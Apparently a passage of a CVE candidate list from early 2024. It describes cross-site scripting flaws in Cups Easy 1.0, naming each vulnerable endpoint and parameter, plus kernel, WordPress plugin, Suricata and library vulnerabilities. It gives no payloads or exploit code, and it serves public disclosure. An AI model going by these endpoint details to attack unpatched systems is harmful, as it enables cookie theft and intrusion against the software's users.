CVE    2024    23886    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemmodify.php, in the bincardinfo parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23885    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrymodify.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23884    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnmodify.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23883    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuremodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23882    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodecreate.php, in the taxcodeid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23881    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23880    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23879    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statemodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23878    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnprint.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23877    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencycreate.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23876    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurecreate.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23875    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancedisplay.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23874    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/companymodify.php, in the address1 parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23873    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencymodify.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23872    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23871    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23870    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelist.php, in the delete parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    2387    Candidate    The Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms plugin for WordPress is vulnerable to SQL Injection via the ‘integration_id’ parameter in all versions up to, and including, 1.82.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries and subsequently inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/advanced-form-integration/trunk/includes/class-adfoin-log-table.php#L227   |   URL:https://plugins.trac.wordpress.org/browser/advanced-form-integration/trunk/includes/class-adfoin-log-table.php#L227   |   MISC:https://plugins.trac.wordpress.org/browser/advanced-form-integration/trunk/includes/class-adfoin-log-table.php#L275   |   URL:https://plugins.trac.wordpress.org/browser/advanced-form-integration/trunk/includes/class-adfoin-log-table.php#L275   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052201%40advanced-form-integration&new=3052201%40advanced-form-integration&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052201%40advanced-form-integration&new=3052201%40advanced-form-integration&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/45d5a677-9b8b-4258-9cfb-101b0f0e6f6f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/45d5a677-9b8b-4258-9cfb-101b0f0e6f6f?source=cve    Assigned (20240311)
CVE    2024    23869    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuanceprint.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23868    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlist.php, in the deleted parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23867    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statecreate.php, in the stateid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23866    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrycreate.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23865    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23864    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23863    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuredisplay.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23862    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grndisplay.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23861    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementcreate.php, in the unitofmeasurementid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23860    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23859    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelinecreate.php, in the flatamount parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23858    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23857    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23856    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemlist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23855    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodemodify.php, in multiple parameters. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23854    Candidate    ** REJECT ** This CVE ID was unused by the CNA.        Assigned (20240123)
CVE    2024    23851    Candidate    copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl.    FEDORA:FEDORA-2024-d16d94b00d   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/   |   MISC:https://www.spinics.net/lists/dm-devel/msg56574.html   |   MISC:https://www.spinics.net/lists/dm-devel/msg56694.html    Assigned (20240123)
CVE    2024    23850    Candidate    In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation.    FEDORA:FEDORA-2024-d16d94b00d   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/   |   MISC:https://lore.kernel.org/all/6a80cb4b32af89787dadee728310e5e2ca85343f.1705741883.git.wqu@suse.com/   |   MISC:https://lore.kernel.org/lkml/CALGdzuo6awWdau3X=8XK547x2vX_-VoFmH1aPsqosRTQ5WzJVA@mail.gmail.com/    Assigned (20240123)
CVE    2024    23849    Candidate    In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access.    FEDORA:FEDORA-2024-2116a8468b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/   |   FEDORA:FEDORA-2024-cf47b35a6c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LBVHM4LGMFIHBN4UBESYRFMYX3WUICV5/   |   MISC:https://bugzilla.suse.com/show_bug.cgi?id=1219127   |   MISC:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=13e788deb7348cc88df34bed736c3b3b9927ea52   |   MISC:https://lore.kernel.org/netdev/1705715319-19199-1-git-send-email-sharath.srinivasan@oracle.com/   |   MISC:https://lore.kernel.org/netdev/CALGdzuoVdq-wtQ4Az9iottBqC5cv9ZhcE5q8N7LfYFvkRsOVcw@mail.gmail.com    Assigned (20240123)
CVE    2024    23848    Candidate    In the Linux kernel through 6.7.1, there is a use-after-free in cec_queue_msg_fh, related to drivers/media/cec/core/cec-adap.c and drivers/media/cec/core/cec-api.c.    MISC:https://lore.kernel.org/lkml/e9f42704-2f99-4f2c-ade5-f952e5fd53e5@xs4all.nl/    Assigned (20240123)
CVE    2024    23842    Candidate    Improper Input Validation in Hitron Systems DVR LGUVR-16H 1.02~4.02 allows an attacker to cause a network attack when the default admin ID/PW is in use.    MISC:http://www.hitron.co.kr/firmware/   |   URL:http://www.hitron.co.kr/firmware/    Assigned (20240123)
CVE    2024    23841    Candidate    apollo-client-nextjs is the Apollo Client support for the Next.js App Router. The @apollo/experimental-apollo-client-nextjs NPM package is vulnerable to a cross-site scripting vulnerability. To exploit this vulnerability, an attacker would need to either inject malicious input (e.g. by redirecting a user to a specifically-crafted link) or arrange to have malicious input be returned by a GraphQL server (e.g. by persisting it in a database). To fix this issue, please update to version 0.7.0 or later.    MISC:https://github.com/apollographql/apollo-client-nextjs/commit/b92bc42abd5f8e17d4db361c36bd08e4f541a46b   |   URL:https://github.com/apollographql/apollo-client-nextjs/commit/b92bc42abd5f8e17d4db361c36bd08e4f541a46b   |   MISC:https://github.com/apollographql/apollo-client-nextjs/security/advisories/GHSA-rv8p-rr2h-fgpg   |   URL:https://github.com/apollographql/apollo-client-nextjs/security/advisories/GHSA-rv8p-rr2h-fgpg    Assigned (20240122)
CVE    2024    23840    Candidate    GoReleaser builds Go binaries for several platforms, creates a GitHub release and then pushes a Homebrew formula to a tap repository. `goreleaser release --debug` log shows secret values used in the custom publisher. This vulnerability is fixed in 1.24.0.    MISC:https://github.com/goreleaser/goreleaser/commit/d5b6a533ca1dc3366983d5d31ee2d2b6232b83c0   |   URL:https://github.com/goreleaser/goreleaser/commit/d5b6a533ca1dc3366983d5d31ee2d2b6232b83c0   |   MISC:https://github.com/goreleaser/goreleaser/security/advisories/GHSA-h3q2-8whx-c29h   |   URL:https://github.com/goreleaser/goreleaser/security/advisories/GHSA-h3q2-8whx-c29h    Assigned (20240122)
CVE    2024    2384    Candidate    The WooCommerce POS plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.4.11. This is due to the plugin not properly verifying the authentication and authorization of the current user. This makes it possible for authenticated attackers, with customer-level access and above, to view potentially sensitive information about other users by leveraging their order id.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3053833%40woocommerce-pos&new=3053833%40woocommerce-pos&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3053833%40woocommerce-pos&new=3053833%40woocommerce-pos&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b8ba69-aa8b-436f-990c-39e283f5d2f2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b8ba69-aa8b-436f-990c-39e283f5d2f2?source=cve    Assigned (20240311)
CVE    2024    23839    Candidate    Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.3, specially crafted traffic can cause a heap use after free if the ruleset uses the http.request_header or http.response_header keyword. The vulnerability has been patched in 7.0.3. To work around the vulnerability, avoid the http.request_header and http.response_header keywords.    FEDORA:FEDORA-2024-7b063bce0a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/   |   FEDORA:FEDORA-2024-bd4eed8466   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/   |   MISC:https://github.com/OISF/suricata/commit/cd731fcaf42e5f7078c9be643bfa0cee2ad53e8f   |   URL:https://github.com/OISF/suricata/commit/cd731fcaf42e5f7078c9be643bfa0cee2ad53e8f   |   MISC:https://github.com/OISF/suricata/security/advisories/GHSA-qxj6-hr2p-mmc7   |   URL:https://github.com/OISF/suricata/security/advisories/GHSA-qxj6-hr2p-mmc7   |   MISC:https://redmine.openinfosecfoundation.org/issues/6657   |   URL:https://redmine.openinfosecfoundation.org/issues/6657    Assigned (20240122)
CVE    2024    23838    Candidate    TrueLayer.NET is the .Net client for TrueLayer. The vulnerability could potentially allow a malicious actor to gain control over the destination URL of the HttpClient used in the API classes. For applications using the SDK, requests to unexpected resources on local networks or to the internet could be made which could lead to information disclosure. The issue can be mitigated by having strict egress rules limiting the destinations to which requests can be made, and applying strict validation to any user input passed to the `truelayer-dotnet` library. Versions of TrueLayer.Client `v1.6.0` and later are not affected.    MISC:https://github.com/TrueLayer/truelayer-dotnet/commit/75e436ed5360faa73d6e7ce3a9903a3c49505e3e   |   URL:https://github.com/TrueLayer/truelayer-dotnet/commit/75e436ed5360faa73d6e7ce3a9903a3c49505e3e   |   MISC:https://github.com/TrueLayer/truelayer-dotnet/security/advisories/GHSA-67m4-qxp3-j6hh   |   URL:https://github.com/TrueLayer/truelayer-dotnet/security/advisories/GHSA-67m4-qxp3-j6hh    Assigned (20240122)
CVE    2024    23837    Candidate    LibHTP is a security-aware parser for the HTTP protocol. Crafted traffic can cause excessive processing time of HTTP headers, leading to denial of service. This issue is addressed in 0.5.46.    FEDORA:FEDORA-2024-7b063bce0a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/   |   FEDORA:FEDORA-2024-bd4eed8466   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/   |   MISC:https://github.com/OISF/libhtp/commit/20ac301d801cdf01b3f021cca08a22a87f477c4a   |   URL:https://github.com/OISF/libhtp/commit/20ac301d801cdf01b3f021cca08a22a87f477c4a   |   MISC:https://github.com/OISF/libhtp/security/advisories/GHSA-f9wf-rrjj-qx8m   |   URL:https://github.com/OISF/libhtp/security/advisories/GHSA-f9wf-rrjj-qx8m   |   MISC:https://redmine.openinfosecfoundation.org/issues/6444   |   URL:https://redmine.openinfosecfoundation.org/issues/6444    Assigned (20240122)
CVE    2024    23836    Candidate    Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 6.0.16 and 7.0.3, an attacker can craft traffic to cause Suricata to use far more CPU and memory for processing the traffic than needed, which can lead to extreme slowdowns and denial of service. This vulnerability is patched in 6.0.16 or 7.0.3. Workarounds include disabling the affected protocol app-layer parser in the yaml; reducing the `stream.reassembly.depth` value also helps reduce the severity of the issue.    FEDORA:FEDORA-2024-7b063bce0a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/   |   FEDORA:FEDORA-2024-bd4eed8466   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/   |   MISC:https://github.com/OISF/suricata/commit/18841a58da71e735ddf4e52cbfa6989755ecbeb7   |   URL:https://github.com/OISF/suricata/commit/18841a58da71e735ddf4e52cbfa6989755ecbeb7   |   MISC:https://github.com/OISF/suricata/commit/2a2120ecf10c5b5713ec2bf59469fe57f7b5b747   |   URL:https://github.com/OISF/suricata/commit/2a2120ecf10c5b5713ec2bf59469fe57f7b5b747   |   MISC:https://github.com/OISF/suricata/commit/83c5567ea7b0b28376f57dcfee9c6301448c7bc7   |   URL:https://github.com/OISF/suricata/commit/83c5567ea7b0b28376f57dcfee9c6301448c7bc7   |   MISC:https://github.com/OISF/suricata/commit/8efaebe293e2a74c8e323fa85a6f5fadf82801bc   |   URL:https://github.com/OISF/suricata/commit/8efaebe293e2a74c8e323fa85a6f5fadf82801bc   |   